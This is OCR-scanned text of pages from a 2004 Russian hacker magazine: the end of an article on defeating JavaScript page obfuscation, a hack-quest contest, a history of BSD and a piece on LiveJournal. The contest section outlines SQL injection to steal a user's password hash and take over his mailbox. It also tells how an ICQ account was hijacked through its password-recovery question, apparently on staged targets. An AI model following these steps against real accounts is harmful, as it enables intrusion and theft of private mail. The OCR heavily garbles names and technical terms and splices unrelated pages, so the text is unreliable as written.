баѵа-скриптов. Дальнейшие странствия по 
всемирной паутине предоставили информа- 
цию еще о нескольких программных продук- 
тах, имеющих то же предназначение. Авторы 
этих программ также на полном серьезе за- 
являют о защите контента, что при воспоми- 
нании об «НТМ1_ Оиагбіап» вызывает лишь 
усмешку. Для расшифровки файлов, обрабо- 
танных этой программой, не потребовалось 
ни глубокого знания скриптового языка, ни 
алгоритмов кодирования. Достаточно было 
лишь чуточку внимания и нестандартного 
подхода. Еще несколько минут - и у меня был 
бы скрипт, декодирующий любой файл, обра- 
ботанный этой программой. Но я ведь не пи- 
шу вредоносное программное обеспечение и 
не посягаю ни на чьи авторские права. 

А ВМЕСТО ЗПКПЮЧЕНИЯ 

Меня умиляют эти программисты, берущие 
деньги за «защиту», обход которой по плечу 
даже дилетанту. Давно пора понять: как бы 
ни был запутан баѵаЗсгірІ- или ѴВЗсгірІ-код, 
какие бы хитроумные алгоритмы ни приме- 
нялись, всегда найдется человек, у которого 
хватит терпения его расшифровать. Можно 
отключить меню браузера, можно создавать 
сайты целиком на РІазіі, можно разместить 
текст в виде графики, можно придумать еще 
массу всего. Но друг, ничего из этого тебе 
не поможет :). Так что если уж ты выклады- 
ваешь что-то на всеобщее обозрение в инет, 
не стоит разводить нюни и париться над ка- 
кой-то мнимой защитой. Информация долж- 
на быть доступной, так что не фига - все 












ХПКЕР/№09(69)/2004 




П ромчался месяц с момента запуска августо- 
вского конкурса, поэтому пришло время 
поздравлять победителя. Прошлый квест по- 
могал придумывать Хи нт, поэтому для того чтобы 
его пройти, нужно было включить смекалку на 
максимум и временно забыть про компы - только 
тогда бы удалось угнать асю. В общем, мегамоз- 
гом, а точнее, сочетанием двух мозгов, в этот раз 
стали козі и ѴоІР. Они первыми прошли квест, и 
потребовалась им для этого одна ночь. 

Вот сейчас ты держишь в руках новенький вы- 
пуск ][ и догадываешься, наверное, что мы под- 
готовили для тебя еще один хак-квест, - такая уж 
у нас традиция. Итак, следующий конкурс нач- 
нется 22-го сентября и будет заключаться вот в 
чем. Падонки создали службу интернет-зна- 
комств для хакеров. Так получилось, что на нее 
часто заходит какой-то китайский хаксор сука- 
масука в поисках напарника в своих грязных де- 
лишках. Твоя цель - взломать сайт падонкафф, 
узнать мыло суки-масуки и хитроумным методом 
достать пасс от его ящика (который на самом де- 
ле совпадет с пассом от его аккаунта на 



ѵѵѵѵѵѵ.расіопак.ги). После этого тебе нужно выбрать из 
корзины его мыльника важную корреспонден- 
цию и отправить ее на мыло конкурса 

(копкиг5@геаІ.хакер.ги) . 

Л ВЗПОИ ЦЕПЕС00БРПЗНЕЕ 

развитъ но следующие шаги: 

О. Регаешься на сайте службы знакомств, кото- 
рая расположена по известному адресу - ѵѵѵѵѵѵ.расіоп- 
ак.ги 

О. Логинишься. 

Ѳ. Идешь в раздел «Поиск друга» и выводишь 
список всех юзеров. 

О. С помощью технологии 50І_-іпіес1:іоп получа- 
ешь хеш пасса нужного аккаунта. 

Ѳ. Пробуешь расшифровать хеш суки-масуки, 
но у тебя ничего не получается - пароль абсо- 
лютно не брутабельный. 

О. Обламываешься с расшифровкой и ищешь 
другие методы взлома :). 

О. (Ьопиз) Проходишь конкурс первым и 
получаешь приз - плрЗ-плеер ВЕЫО *)оуЬее 
110 . 



Л кок нужно выло проходить августовский КОНКУРС 

Прошлый конкурс, как я уже говорил, не был связан с хакерством, а был рассчитан только на остроту ума. 
Для того чтобы победить в августовском конкурсе, нужно было пройти следующие шаги: 

О. Пробиваешь по базе шестизнаков праймари-етаіі от нужного ІІІКІ’а. 

О. Пытаешься восстановить пароль по секретному вопросу. 

О. Секретный вопрос выглядит следующим образом: «371069?». 

О. Ты догадываешься, что нужно посмотреть делали ІЛЫ’а 371069. 

О. В деталях стоит линк на ЗРС-картинку, состоящую из восьми разноцветных полос. 

О. Спустя какое-то время понимаешь, что нужно посмотреть код цвета для каждой из восьми полос. 

О. Собираешь все 8 кодов, преобразуешь в АЗСІІ -представление и получаешь пасс от аси 371069. 

О. Заходишь в ІСО 371069 и получаешь сообщение с пассом от юина, который требовалось поломать. 




СЦЕНП 
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книге истории В80 намного больше страниц, чем в истории Ііпих. Беря начало в далеких семидесятых, ВЗО пережила эпоху ІЛІІН- 
мейнфреймов и расцвета самых разнообразных ІЛІІИ-систем. Она и по сей день доказывает свою вечность и востребованность в 
лице современного поколения свободных, в духе орепвоигсе-времени, дистрибутивов. Этой осенью выходит новый релиз ІгееВЗВ 
5.3, первый в стабильной ветке 5 и знаменующий переход на новый качественный уровень. Не за горами релиз №080 2.0, имеющий 
примерно такое же значение. И то и другое - безусловно, настоящее событие дня всех Ы'шников. Эта статья - посвящение легендарной 
операционной системе. 



20 ПЕТ НО СЛУЖБЕ СЕТИ 



А ПРОФЕССОР ИЗ БЕРКПИ 

ел 1 973 год. Время нача- 
ла расцвета глэм-рока, 
вьетнамской войны и 
операционной системы 
ІІІМІХ. Той самой, перво- 
начальной, от АТ&Т (ВеІІ 
БаЬз), которая успела 
с момента первого рели- 
за 1971 года (ІІМІХТіте ЗМагіпд Зузіет Рігзі 
ЕсІШоп, или просто ІІІМІХ Зузіет VI ) дорасти 
до четвертой версии, выпущенной в ноябре. 
И в ноябре же, на симпозиуме «Принципы 
проектирования операционных систем» в 
университете Пурдью (Ригсіие) авторы ІІІМІХ 
Кен Томпсон и Деннис Ритчи выступили со 
свом первым докладом на тему новой ОС. 

На этом симпозиуме присутствовал профес- 
сор Боб Фабри из Калифорнийского универ- 
ситета Беркли, которого настолько поразила 
красота операционки, что он сразу же зака- 
зал копию дистрибутива на магнитной ленте 
для своего университета. О коммерческом 
применении ІЛМІХ тогда не было и речи, 

АТ&Т свободно раздавала исходные тексты 
своей системы для изучения в образователь- 
ных учреждениях. 

Для установки и изучения ІІІМІХ совмест- 
ными усилиями факультетов компьютерных 




наук, математики и статистики университет 
Беркли приобрел новый компьютер РОР- 
11/45 от йЕС. И в январе 1974 года аспирант 
Кейт Стэндифорд уже вставлял свежеполу- 
ченную ленту с ІІІМІХ Зузіет Ѵ4 в считываю- 
щий привод терминала. Как правило, в уни- 
верситетах, получивших копию ІІІМІХ, уста- 
новку системы выполнял сам Кен Томпсон. 

Но в Беркли решили обойтись силами своих 
студентов. Через какое-то время помощь Ке- 
на все-таки понадобилась - система перио- 
дически аварийно рушилась. Вместо того, 
чтобы отправиться в Беркли, Томпсон позво- 
нил Стэндифорду и указал тому соединить 
модем с телефоном, чтобы иметь возмож- 
ность удаленно отлаживать систему. Выясни- 
лось, что проблема была в драйвере диско- 
вого контроллера - РЭР-1 1/45 оказалась пер- 
вой в практике Томпсона машиной, имевшей 
два диска на одном контроллере, на что 
драйвер не был рассчитан. Так началось сот- 
рудничество ВеІІ 1_аЬз и Калифорнийского 
университета по совершенствованию ІІІМІХ. 

Позже в университете появился еще один 
компьютер под управлением ІІІМІХ. Машины 
в Беркли, как и в других вузах того времени, 
работали строго по расписанию - кому-то 
был нужен ІІІМІХ, кому-то - ВЗТЗ, собствен- 
ная операционка от ЭЕС, ставившаяся тогда 
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на все РЭР. С 8 утра до 4 вечера на компью- 
тере работал II N IX, а затем до полуночи - 
ВЗТЗ. Это очень не устраивало профессоров 
Юджина Вонга и Майкла Стоунбрейкера, ко- 
торых настолько восхитили возможности но- 
вой ОС, что они захотели побыстрее пере- 
нести на нее разрабатываемую ими крупную 
базу данных ІМОРЕЗ. Машинного времени 
постоянно не хватало, и весной 1975 года в 
Беркли появился еще один ЭЕС-1 1/40 под 
управлением вышедшей к тому моменту 
ІШ Зузіет Ѵ5. К осени ІІЧОВЕЗЗ под ІШ 
разошлась в количестве нескольких сотен 
экземпляров, в результате чего Беркли полу- 
чил репутацию университета, в котором рож- 
даются действительно крупные проекты. 

Интерес студентов к 11МХ был поистине 
огромным, и осенью 1975 года Фарби со 
Стоунбрейкером решили приобрести новую 
модель РОР- 1 1/70, которая была гораздо 
мощнее предыдущих. В это же время Кен 
Томпсон, выпускник Калифорнийского уни- 
верситета, решил ненадолго навестить свою 
альма-матер и захватил с собой самую пос- 
леднюю на тот момент версию ІІМІХ - Зузіет 
Ѵ6, которую установили на новую РОР- 1 1/70. 

Л РОЖДЕНИЕ В80 

Итак, к 1 976 году в Беркли было уже нес- 
колько машин под управлением ІІМІХ. Но о 
серьезной ее доработке никто не помышлял, 
пока системой не заинтересовались два сту- 
дента, только что закончившие обучение, - 
Билл Джой и Чак Хэйли. Поначалу они про- 
водили дни и ночи за РЭР-1 1/70, работая 
над компилятором и языком РазсаІ, в итоге 
сделав его лучшей средой для обучения сту- 
дентов программированию. Затем, после за- 
мены текстовых телетайпов на экранные тер- 
миналы, Джой обнаружил, что текстовый ре- 
дактор еб, использовавшийся тогда, их уже 
не устраивает. И он приступил к работе над 
своим редактором, который назвал ех. 

В 1 976 году, после отъезда Кена Томпсона 
Джой и Хэйли стали самостоятельно ковы- 
ряться во внутренностях ядра ІІМІХ. Результа- 
том этого стали небольшие изменения в коде 
и несколько исправлений. Эти два парня ста- 
ли первыми кернел-хакерами из Беркли. 

В 1977 году Билл Джой, осознав, что од- 
ними исправлениями не обойтись, начал де- 
лать свой дистрибутив. Так 9 марта 1978 го- 
да появился «Вегкеіеу ЗоЙѵѵаге ЭізІгіЬіЛіоп» - 
первый релиз операционной системы Берк- 
ли. Он включал в себя пресловутую РазсаІ - 
систему со всеми исходными текстами и ре- 
дактор ех. В течение следующего года по 
разным вузам разошлось 30 копий новой 
ОС. Затем на РОР Беркли вновь обновили 
устройства ввода, поставив новенькие тер- 
миналы АОМ-За, и Джой решил написать 
текстовый редактор, который использовал 
бы всю визуальную мощность новых монито- 
ров. Так родился великий и ужасный ѵі (ѵізи- 
аі ебііог). Кроме того, Джой решил проблему 
совместимости вывода на терминалах разно- 
го типа, написав не менее знаменитую биб- 
лиотеку Іегтсар. Все это вошло во второй 
релиз ОС, «Зесопб Вегкеіеу ЗоЙѵѵаге 
ОізІгМоп», вышедший 10 мая 1979 года. 
Позже имя сократили до лаконичного 2ВЗЭ. 
Финальная версия второго релиза, 2.1 1ВЗЭ, 
с улучшениями и дополнениями, сделанны- 
ми в результате обширного тестирования 
системы в нескольких университетах, была 



установлена на сотни РОР-1 1 машин по все- 
му миру. По сути, состоялось первое серьез- 
ное клонирование классического ІІМІХ. Весь- 
ма удачное клонирование. 

В 1 978 году шестнадцатибитные РОР уже 
не удовлетворяли многих хакеров, им на 
смену пришли ѴАХ - новые мощные машины 
от ОЕС, работающие под ОС ѴМЗ. Разумеет- 
ся, в ВеІІ ЬаЬз портировали свою, уже седь- 
мую версию ІІМІХ на новые машины, однако 
их система не использовала всех преиму- 
ществ виртуальной памяти ѴАХ. К разреше- 
нию этой проблемы привлекли кернел-хаке- 
ров из Беркли во главе с Биллом Джоем. 
Джой был поражен возможностями нового 
железа - эта система оставляла РОР-1 1 да- 
леко за бортом. Так он начал портировать 
2ВЗО на ѴАХ. 

Пока его коллеги Питер Кесслер и Кирк 
Маккусик портировали Паскаль, Джой пере- 
писал ех и ѵі, свою новую командную обо- 
лочку С зііеіі и остальные утилиты. В итоге, 
в 1 979 году Беркли выпустила законченную 
сборку 2ВЗО под ѴАХ. 

Одновременно с этим событием ВеІІ І_аЬз 
решила поставить ІІМІХ на коммерческие рель- 
сы и основала подразделение по подготовке и 
выпуску стабильных релизов. ІІМІХ перестал 
быть исследовательским проектом, представ- 
ляя теперь коммерческий продукт АТ&Т. Роль 
центра разработки ІІМІХ, ранее принадлежав- 
шая ВеІІ І_аЬз, теперь перешла к Беркли. 

К 1 979 году американское агентство пере- 
довых оборонных разработок БАРРА 
(БеТепсе Абѵапсеб РезеагсМ Ргоіесіз Адепсу) 
столкнулось с проблемой устаревания мно- 
гих компьютеров, составляющих ее знамени- 
тую сеть АВРАМ ЕТ. В случае замены потре- 
бовалось бы портировать все программное 
обеспечение на новые машины. Сказывалась 
разношерстность сети - разные машины, 
разные операционные системы. Было ясно, 
что для дальнейшего масштабирования и 
развития сети необходима стандартизация. 
Так как выбор единой аппаратной платфор- 
мы для построения сети представлялся 



труднореализуемым, стандартизацию реши- 





| Билл Джой 




0ТПИЧИЯВ80ѴШШ 



Е сли ты прочитал 
статью, ты, навер- 
ное, сам сможешь 
ответить на этот воп- 
рос. В5Э - это целая 
операционная сис- 
тема с 30-летней ис- 
торией, тогда как 
І_іпих - всего лишь 
ядро, само по себе к 
употреблению не 
пригодное. Поэтому, 
говоря о дистрибу- 
тивах І_іпих, коррект- 
нее называть их 
СІ\ІІ)/І_іпих - опера- 
ционная система 
СЫІІ с ядром І_іпих. 

СІЧІІ - это фонд 
программного обес- 
печения, который 
появился в 80-ые го- 
ды с целью создать 
свободный ІІІЧІХ, 
распространяемый 
под ОРЬлицензией. 

Отец СІЧІІ и СРІ_ - 
Ричард Столл ман. 

Если говорить о тех- 
нической стороне 
дела, то в В50, в от- 
личие от классичес- 
кой 1)МХ Зузіепл, нет 
понятия уровня за- 
пуска (гипіеѵеіз), а 
есть только два ре- 
жима - однопользо- 
вательский (зіпдіе 
изег) и многопользо- 
вательский (плиШ 
изег). Соответствен- 
но, имеется разница 
в расположении уп- 
равляющих скрип- 
тов и в поведении 
некоторых утилит. 

Наконец, В50 имеет 

исторически сформированную иерархию 
файловой системы, набора сервисов и 
скриптов, тогда как в І_іпих все упомянутое 
скачет от дистрибутива к дистрибутиву, как 
разработчики пожелают. 



дерево развития В50 
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ли провести на уровне ОС. Разумеется, в ка- 
честве единой операционной системы был 
выбран ІІІМІХ, который, казалось, можно пор- 
тировать на самое невообразимое железо. 

Осенью 1 979 года профессор Фарби 
прослышал про интерес ЭАРРА к ІІІМІХ и 
предложил услуги своего университета. Вы- 
шедший в декабре того же года релиз ЗВЗО 
подтвердил, что новая система как нельзя 
лучше подходила нуждам военных, и в апре- 
ле 1 980-го Беркли получила полуторагодич- 
ный контракт ОАРРА. Под контрактные рабо- 
ты была создана организация СотріЛег 
ЗузТет ВезеагсИ Огоир (СЗВО) - отделение 
университета, куда входили студенты и про- 
фессора, занятые работой над ВЗЭ. Резуль- 
тат не заставил себя ждать - в октябре того 
же года выходит 4.0ВЗО с почтовой систе- 
мой, планировщиком задач и многими дру- 
гими улучшениями. ЭАРРА осталась доволь- 
на результатом и продлила контакт, увели- 
чив инвестиции почти в пять раз. 

Следующий релиз ВЗО должен был, по 
логике, называться 5В30. Однако в АТ&Т соч- 
ли, что пользователи могут спутать 5В30 с 
их текущим коммерческим релизом, ЗузТетѴ 
(5). По этой причине Беркли решила ввести 
дополнительную нумерацию релизов. Так, 
следующими были 4.1 ВЗО и 4.2В30. 

Продленный контракт с ОАРРА предусмат- 
ривал создание новой быстрой файловой 
системы (РазІ Рііе ЗузТет), чтобы эффектив- 
но использовать возможности новых жестких 
дисков, поддержку процессов с многогига- 
байтным адресным пространством, создание 
механизма гибкого межпроцессного взаимо- 
действия, а также единого интегрированного 
стека сетевых протоколов для общения ма- 
шин в АРРАІМЕТ. 

Джой занялся межпроцессным взаимо- 
действием (что впоследствии получило наз- 
вание ІІІМІХ зоскеіз), реализацию файловой 
системы взял на себя Маккусик, а Роб Гур- 
виц реализовал ТСР/ІР, которую затем вклю- 
чили в ядро ВЗО. Тогда же были написаны 
сетевые утилиты для взаимодействия по се- 
ти: гср, Г5І1, гіодіп, гѵѵМо. Получилась нас- 
только хорошая система, что разработчики 
решили выпускать ее не только для ОАРРА. 

Вслед за промежуточными релизами 4.1а 
и 4.1Ь была выпущена 4.2В30. Популяр- 
ность нового релиза оказалась ошеломляю- 
щей - за полтора года он разошелся тира- 
жом более тысячи копий! Со своей новой 
файловой системой РРЗ и интегрированной 
поддержкой сети ОС из Беркли оставила 
ІІІМІХ Зузіет V далеко позади. И хотя потом 
многие возможности 4.2В30 были портиро- 



ваны в ЗузТет V, ВЗО долго оставалась ли- 
дером на рынке ІІМІХ-систем. 

Весной 1982 года Джой, наверное, посчи- 
тал, что основное уже сделано, потому ушел 
в Зип МісгозузТетз. Тем не менее, в системе 
еще многое предстояло отладить, о чем сви- 
детельствовали тесты производительности и 
багрепорты. Это нормальное явление, когда 
ОС становится популярной. Маккусик сото- 
варищи остались в СЗВО, занимаясь очист- 
кой багов и подготовкой нового релиза. 
4.3В30 была выпущена через долгие 4 года 
в июне 1986. Многие пользователи за это 
время возвратились к II N IX ЗузТет V, успев- 
шей приобрести поддержу сети и многие 
другие возможности, появившиеся в 4.2В30. 
Так что новый релиз оси Беркли позволил 
поправить ее пошатнувшиеся позиции. 

В конце восьмидесятых эра ѴАХ подходила 
к концу. Предвидя это, Джой еще во время 
подготовки релиза 4.1 занимался разделени- 
ем кода ядра на машинно-зависимые и неза- 
висимые части, чтобы в дальнейшем их было 
проще адаптировать под новые процессоры. 
Сменить ѴАХ должна была архитектура Роѵѵег 
6/32 от «Сотриіег Сопзоіез, Іпс.», и в Беркли 
даже выпустили 4.3В30 под кодовым назва- 
нием «ТаМое», закончив работу Джоя по раз- 
делению кода. Однако популярности новая 
платформа не снискала и вскоре умерла. Как 
бы то ни было, именно она стала катализато- 
ром завершения работ по созданию настоя- 
щей портируемой системы. Это впослед- 
ствии сыграло свою роль, когда ВЗО порти- 
ровали на множество аппаратных платформ. 

А СЕТЬ.В80-ЛИЦЕНЗИЯ 

и веЛикии суп 

Конец восьмидесятых годов - это расцвет 
всевозможных юниксовых ОС и сетевых тех- 
нологий. К этому времени уже стало ясно, 
что без сети дальше никуда, поэтому основ- 
ное внимание уделялось сетевым компонен- 
там. Угадай с трех раз, у кого в те годы была 
лучшая реализация стека протоколов ТСР/ІР? 
Вот почему сообщество было так заинтере- 
совано в свободном использовании исход- 
ных кодов операционки Беркли. СЗВО, сле- 
дуя традициям исследовательского духа, 
всегда выпускал свою систему вместе с ис- 
ходниками, но, к сожалению, не мог предос- 
тавлять право другим организациям исполь- 
зовать их для применения в своих продуктах. 
Этого не позволяла лицензия, по которой 
АТ&Т распространяла исходники своего 
II N IX. А ВЗО, хоть и была самостоятельной 



системой, основывалась на коде от ВеІІ ЬаЬз. 
Так что любой пользователь ВЗЭ был обязан 
купить лицензию на ІІМІХ у АТ&Т. Но стек 
ТСР/ІР для ВЗО был целиком разработан в 
Беркли, поэтому летом 1989 года принима- 
ется решение выпустить так называемый 
«ІМеТѵѵогкіпд Веіеазе 1», или 4.3В30 ІМеІ/1 - 
по сути, кусок операционной системы, со- 
держащий код сетевого стека протоколов и 
сопутствующих утилит. Код выпустили под 
новой лицензией, которую так и назвали - 
ВЗЭ исепзе. Согласно ей любой мог свобод- 
но загрузить исходные тексты и использо- 
вать их в своих целях, в том числе коммер- 
ческих, без каких-либо отчислений Беркли, 
лишь только сохранив копирайты в тексте 
файлов и указав в документации к своему 
продукту, что он основан на коде из Беркли. 

Поступок парней из Беркли вызвал исклю- 
чительно положительную реакцию. Несколько 
крупных компаний выложили исходные коды 
на свои Йр-сервера для свободного доступа, 
в университет, помимо благодарностей, пос- 
тупило множество пожертвований денежных 
средств на дальнейшее развитие ОС. 

И вскоре Беркли выпустил уже вторую 
версию своего сетевого релиза. В нем поя- 
вились кардинальные изменения в подсисте- 
ме виртуальной памяти (код взят из проекта 
МасМ университета Карнеги-Мелона) и новая 
сетевая файловая система (ІМРЗ). В обоих 
случаях использовались готовые наработки 
дружественных университетов, что показало 
выгоду и ценность ВЗО-лицензии - вместо 
того чтобы писать что-то с нуля, можно ис- 
пользовать то, что написали другие, в ответ 
предоставляя им свои наработки. Таким об- 
разом, не было нужды изобретать велоси- 
пед, и время тратилось на новые разработки. 

Новый релиз ВЗО должен был иметь по- 
рядковый номер 4.4, однако в Беркли реши- 
ли предварительно протестировать измене- 
ния, выпустив в начале 1990 года релиз 
4.3ВЗЭ-Вепо. 

Вскоре после этого один из разработчиков 
ВЗЭ Кейт Бостик вспомнил про удачный опыт 
с сетевым релизом и отметил, что неплохо 
бы выпустить и остальную часть системы под 
ВЗЭ-лицензией. Однако для этого потребо- 
валось бы переписать огромное количество 
утилит из библиотек, пришедших в ВЗО из 
АТ&Т ІІІМІХ. Ведущие на тот момент разработ- 
чики Кирк Маккусик и Майк Карельс скепти- 
чески восприняли идею - уж больно велик 
был объем работы. Но Бостик не сдавался. 

Он решился на эксперимент, который в ка- 



Новая система как нельзя лучше 
подходила нуждам военных. 



НИКСЫ 

П о аналогии с неофициальным термином «*піх», обозначаю- 
щим все ІІМХ-системы, существует термин «хВЗЭ», который 
употребляется в случае, если речь идет не о конкретном проек- 
те, а о семействе дистрибутивов в целом. 
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ИСТОРИЯ ОС В80 



В80-ПИЦЕНЗИЯ 

В 50-лицензия, наверное, самая либеральная за всю исто- 
рию. Ее требования можно сформулировать в трех пунктах: 

а Не утверждай, что ты написал это. Сохраняй наши копирайты 
в исходных текстах. Если распространяешь свой продукт толь- 
ко в бинарном виде - указывай в сопроводительной документа- 
ции, что он использует код из Беркли. 

л Не используй наше имя для продвижения своего продукта. То, 
что ты сделал, основано на коде В5Б, но не имеет права назы- 
ваться ВЭБ. Наша марка не может использоваться в рекламных 
целях. 

а Не предъявляй претензии, если что-то не заработает. Нет ни- 
каких гарантий, код предоставляется аз із, на свой страх и риск. 



г 



кой-то степени затем был повторен Линусом 
Торвальдсом и стал основой развития систем 
с открытыми исходниками. Бостик призвал 
ВЗО-хакеров со всей сети переписать ІІІМІХ- 
утилиты, руководствуясь лишь инструкциями 
того, что те должны делать. 18 месяцев спус- 
тя практически все утилиты и библиотеки 
были переписаны. У Беркли теперь была 
действительно своя система. Оставалось пе- 
реписать ядро, которое к тому времени уже в 
значительной мере было своим. И Маккусик, 
Карел ьс, Бостик, забросив все дела, приня- 
лись строчка за строчкой изучать файлы яд- 
ра, оставшиеся со времен АТ&Т ІІМІХ. В итоге 
осталось всего шесть файлов, которые, по 
мнению разработчиков, так просто перепи- 
сать бы не удалось. Их решили оставить на 
месте и в июне 1991 года Беркли выпустила 
«№1ѵѵогкіпд Веіеазе 2» ( 4.3В30 Ш/2). Те- 
перь практически вся система (кроме шести 
файлов ядра) была абсолютно доступна всем 
желающим под самой дружественной в мире 
ВЗО- лицензией. Это и предопределило буду- 
щую вечную жизнь ВЗО. 

В девяностых годах ІВМ РС окончательно 
захватила нишу недорогих компьютеров. 
Спустя полгода после второго сетевого ре- 
лиза, Билл Джолиц начал портировать №1/2 
на архитектуру І386, переписав недостающие 
6 файлов. Он назвал свою работу 386/В80 и 
распространил ее по сети. Затея оказалась 
удачной, и вскоре группы пользователей 
386/В80 занялись написанием патчей и усо- 



вершенствованием системы. Так стартовали 
современные проекты №Ш80 и РгееВ80. 

Сам Джолиц вместе с некоторыми члена- 
ми СЗВСі ушел продвигать ВЗО в коммер- 
цию, основав компанию В80І (Вегкеіеу 
ЗоЙѵѵаге Оезідп, Іпс.). Благо, код, выпущен- 
ный под ВЗО-лицензией, позволял прода- 
вать дистрибутив без исходных кодов. ВЗОІ 
активно рекламировала свою новую систему 
В30/03 как ІІМІХ, и всем заинтересованным 
предлагалось звонить по телефону 1 -800- 
ІТЗ-ІІМІХ. Однако компанию АТ&Т возмутил 
такой шаг, и она в лице ІІпіх Зузіет 
ЬаЬога^опез (ІІЗЦ, подразделения по прода- 
же и разработке ІІМІХ, потребовала немед- 
ленно прекратить рекламировать продукт 
ВЗОІ как ІІМІХ и убрать номер телефона. Ус- 
ловия были выполнены, и В80І даже смени- 
ла рекламу своего продукта, объясняя, что 
это не ІІМІХ. Однако 1181. этого было мало, и 
она подала в суд на В80І, обвинив компа- 
нию в продаже кода, принадлежащего ВеІІ 
І_аЬз. В ответ В80І предоставила доказа- 
тельства, что ее система - это не что иное, 
как копия продукта, свободно распространя- 
емого университетом Беркли плюс шесть 
дополнительных файлов, написанных прог- 
раммистами компании. За код Беркли ВЗОІ, 
ясное дело, ответственности не несла, так 
что победа в суде была за ней. 

ІІ8І_ не унималась и подала в суд на Кали- 
форнийский университет в лице СЗВСі. По 
прошествии месяцев долгих разборок было 



В80 00ЕИ0И 

В се знают, что символ ВЗБ - симпатичный демон. Появился 
он в 1988 году с легкой руки Кирка Маккусика, придумавше- 
го талисман для 4.3В50. Разумеется, тот, первоначальный де- 
мон выглядел не совсем так, как современный, символизирую- 
щий РгееВЗБ. Ознакомиться с его историей в картинках можно 
по адресу ѵѵѵѵѵѵ.тскизіск.сот/ЬеазІіе/іпсІех.ІіІтІ. Эви Немет 
в своей классической хрестоматии «ІІпіх Зузіет Абтіпіэігайоп 
НапсІЬоок» так объясняет происхождение этого талисмана: 
«Многие люди пугаются и думают, что демон в данном случае - 
это нечто сатанинское. Однако это не бетоп, а баетоп, в гре- 
ческой мифологии означающий примерно то же, что нынешний 
ангел-хранитель, добрый дух». Как же зовут этого милашку? 
Маккусик утверждает, что у демона нет имени, и это предмет 
его особой гордости, но если ты хочешь, можешь называть его 
Веазііе. 



решено непосредственно сверить код опера- 
ционных систем, чтобы найти в ВЗО куски 
кода ІІ8І_. В итоге из №1/2 были удалены 3 
файла, оставшихся со времен ІІМІХ Зузіет 
Ѵ5, и еще в 70 файлов были добавлены копи- 
райты ІІЗІ_. Все остальное к тому времени 
уже было переписано хакерами из СЗВСІ в 
рамках подготовки МеІ/2. Свободная система 
сохранила свободу! 

По итогам судебных разбирательств окон- 
чательная версия релиза ВЗО вышла под 
названием 4.4ВЗО-Ше летом 1994 года, под 
той же лицензией, что и МеІ/2. Важным ре- 
шением суда был тот факт, что ІІЗІ_ не имела 
права судить какую-либо организацию, ис- 
пользующую 4.4ВЗО-Ше в качестве базы для 
своей ОС. Поэтому все разработчики, уже 
выпускавшие свои релизы на основе МеІ/2 (а 
к тому времени уже существовали МеШЗО и 
РгееВЗО, базировавшиеся на 386/В30), бы- 
ли вынуждены переключиться на новые ис- 
ходные тексты. Что они и сделали за самое 
короткое время. 

Л 4.4В30-ИТЕ2. В80 18 0Е00, 
КЖ6ШЕВ80! 

2 июня 1 995 года вышла 4.4ВЗО-Ше Веіеазе 
2 с небольшими улучшениями и дополнения- 
ми. После этого последнего релиза группа 
СЗВСі университета Беркли объявила о своей 
отставке. За 20 лет ВЗО из клона ІІМІХ прев- 
ратилась в самостоятельную ОС, подарив ми- 
ру надежную файловую систему, эталонную 
реализацию стека ТСР/ІР, систему печати І_РО 
и, что самое главное, свободу. После роспус- 
ка СЗВСі ВЗО не думала умирать. РгееВЗО к 
тому времени стала лидирующей ипіх-Ііке ОС 
на іпіеі-машинах, МеШЗО портировали на 
множество платформ, ВЗО/ОЗ предлагала от- 
личные коммерческие решения. Беркли вы- 
полнили свою миссию, пустив ІІМІХ в свобод- 
ное плавание по сетевому океану, и плавание 
это будет длиться вечно. ЗС 
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ИНСПЙДЕРСКИЙ ОБЗОР жж-комьюнити 



детстве я вел дневник. Знаю, не мужское это занятие записывать свои мысли в школьную тетрадь. Но у меня было много умных 
мыслей, которые действительно достойны войти в анналы истории. Нысли про соседку по парте девочку Нашу, про вкладыши, про 
подозрительный скрип из родительской комнаты и хулигана Вованыча, которому было бы неплохо выбить пару зубов. 



отом как-то подзабил на это 
дело, началась взрослая 
жизнь, университет, рабочие 
будни. Но полтора года назад 
друган познакомил меня с но- 
вой игрушкой продвинутых ру- 
нетчиков шѵѵ.ііѵеіоигпаі.сот. С то- 
го времени, как я зарегил там 
аккаунт, мой дневник «циника и негодяя» 
набрал больше тысячи постоянных читате- 
лей, а сам я достаточно плотно влился в ЖЖ- 
тусу. Думаю, пришло время рассказать тебе 
о модном нынче явлении, но не с техничес- 
кой стороны, как это делали многие другие 
(разобраться в настройках несложно), а по- 
ведать об атмосфере, творящейся внутри. 



А ИСТОРИЧЕСКИЕ КОРНИ 

История ІіѵфигпаІ (он же и, он же Живой Жур- 
нал, он же ЖЖ) началась в апреле 1 999 года, 
когда 19-летний американский программер 
Брэд Фицпатрик зарегистрировал домен Ііѵфиг- 
паі.сош и выложил клиент для работы с сетевы- 
ми дневниками. Программка поначалу была на- 
писана для себя - парень уже второй год вел 
собственный дневник, который читали его 
друзья, и обновлять его через клиент оказалось 
куда как приятнее. Оценив удобный сервис, 
собственные дневники стали заводить сперва 
кореша Брэда, а затем и люди со стороны. 

Популярность и росла как на дрожжах. 
Если в 2000 году количество дневников дос- 



тигало 13 тысяч, то всего через год число 
возросло до 400 тысяч! Первое время этому 
во многом способствовали порномодели из 
платных ѵѵеЬсатз, которые заводили днев- 
ники, подавая пример своим многочислен- 
ным поклонникам. 

Фицпатрик, никак не ожидавший такого 
бума, уже не мог сам рулить проектом и 
сколотил команду поддержки. Чтобы уделять 
ЖЖ больше времени, он даже уволился с 
высокооплачиваемой работы в Кремниевой 
Долине. Средства на техобслуживание сер- 
вера и зарплату и сгеѵѵ поступали от поль- 
зователей платных аккаунтов, которые полу- 
чали более расширенные возможности по 
сравнению с остальными Ы-юзерами. 





94 



30 СТЕКЛОМ 




2 сентября 2001 года, чтобы уменьшить 
количество поступающих жалоб, команда 
поддержки ІіѵфигпаІ ввела инвайт-коды. От- 
ныне чтобы создать новый дневник, требо- 
валось ввести специальный пригласитель- 
ный код. Впрочем, при большом желании 
достать его не было проблемой - платные 
юзеры могли генерить по 5 кодов в месяц, а 
при создании халявного аккаунта выдавался 
новый код вместо потраченного. 

Датой рождения ЖЖ в России принято 
считать 1 февраля 2001 года - именно в этот 
день появилась первая запись на русском 
языке от Романа Лейблова ака г_І (шѵѵ.Ііѵеіоиг 
паІ.сот/~М/13503.МтІ). Ссылку на и Рома уви- 
дел в гостевой сайта «Вечерний Интернет» 
и, любопытства ради, решил попробовать 
завести свой дневник. Сервис понравился, и 
г_І сообщил о нем своим друзьям. Те, в свою 
очередь, познакомили с ЖЖ своих друзей, и 
пошло-поехало. 

Вскоре после этого ссылки на ЖЖ стали 
появляться на популярных ресурсах рунета, а 
